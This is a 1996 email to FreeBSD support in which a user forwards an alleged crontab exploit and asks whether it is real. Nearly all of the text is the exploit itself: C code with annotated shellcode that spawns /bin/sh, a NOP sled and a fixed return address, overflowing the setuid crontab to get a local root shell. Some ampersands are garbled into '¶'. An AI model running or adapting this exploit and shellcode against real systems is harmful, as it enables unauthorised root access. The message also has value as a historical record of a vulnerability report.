Date: Mon, 16 Dec 1996 08:54:18 -0800 From: James Bass <james@fastrans.net> To: support@freebsd.org Subject: security risk? Message-ID: <3.0.32.19961216085418.006997bc@mail.fastrans.net>
Hello.. I run multiple FreeBSD systems running 2.1.5 or greater on all of
them... I love it! It is the best, but.... Someone gave me this, and just
out of curiosity, I wanted to know if it was legitimate or not.... It is
allegedly a crontab bug...
>/* ---------------------------- CUT HERE
----------------------------------- */
>/*
*/
>/* Hi !
*/
>/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).
*/
>/* If you have any problems with it, drop me a letter.
*/
>/* Have fun !
*/
>/*
*/
>/*
*/
>/* ----------------------
*/
>/* ---------------------------------------------
*/
>/* ----------------- Dedicated to my beautiful lady
------------------ */
>/* ---------------------------------------------
*/
>/* ----------------------
*/
>/*
*/
>/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
*/
>
>#include <stdio.h>
>main()
>{
>#define length 353
> int i,j;
> unsigned long start_addr;
> char *env[]={NULL};
> char param_string[length];
> char code_string[]=
> {
> "\xeb\x2a" /* jmp cont
*/
>
>/* geteip: */ "\x5d" /* popl %ebp
*/
> "\x55" /* pushl %ebp
*/
> "\xfe\x4d\xe7" /* decb
0xffffffe7(%ebp) */
> "\xfe\x4d\xeb" /* decb
0xffffffeb(%ebp) */
> "\xfe\x4d\xec" /* decb
0xffffffec(%ebp) */
> "\xfe\x4d\xed" /* decb
0xffffffed(%ebp) */
> "\xff\x45\xef" /* incl
0xffffffef(%ebp) */
> "\xfe\x4d\xf4" /* decb
0xfffffff4(%ebp) */
> "\xc3" /* ret
*/
>
>/* 0xffffffe0(%ebp): */ "/bin/sh"
>/* 0xffffffe7(%ebp): */ "\x01"
>
>/* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal
0x3b,%eax */
> "\x9a\xff\xff\xff\xff\x07\x01" /* lcall
0x7,0x0 */
>
>/* cont: */ "\xc7\xc4XXXX" /* movl
$0xXXXXXXXX,%esp */
> "\xe8\xcb\xff\xff\xff" /* call
geteip */
> "\x81\xc5\xef\xff\xff\xff" /* addl
$0xffffffef,%ebp */
> "\x55" /* pushl %ebp
*/
> "\x55" /* pushl %ebp
*/
> "\x81\xc5\xf1\xff\xff\xff" /* addl
$0xfffffff1,%ebp */
> "\x55" /* pushl %ebp
*/
> "\xe8\xd4\xff\xff\xff" /* call
execve */
> };
>
> for(i=0;i<length-1;param_string[i++]='\x90'); param_string[length-1]='\0';
> start_addr=0xefbfddf0;
> *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
> strncpy(¶m_string[200],code_string,strlen(code_string));
> *( (unsigned long*) ¶m_string[348])= start_addr;
>
> execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);
>
>}
>/* ---------------------------- CUT HERE
----------------------------------- */
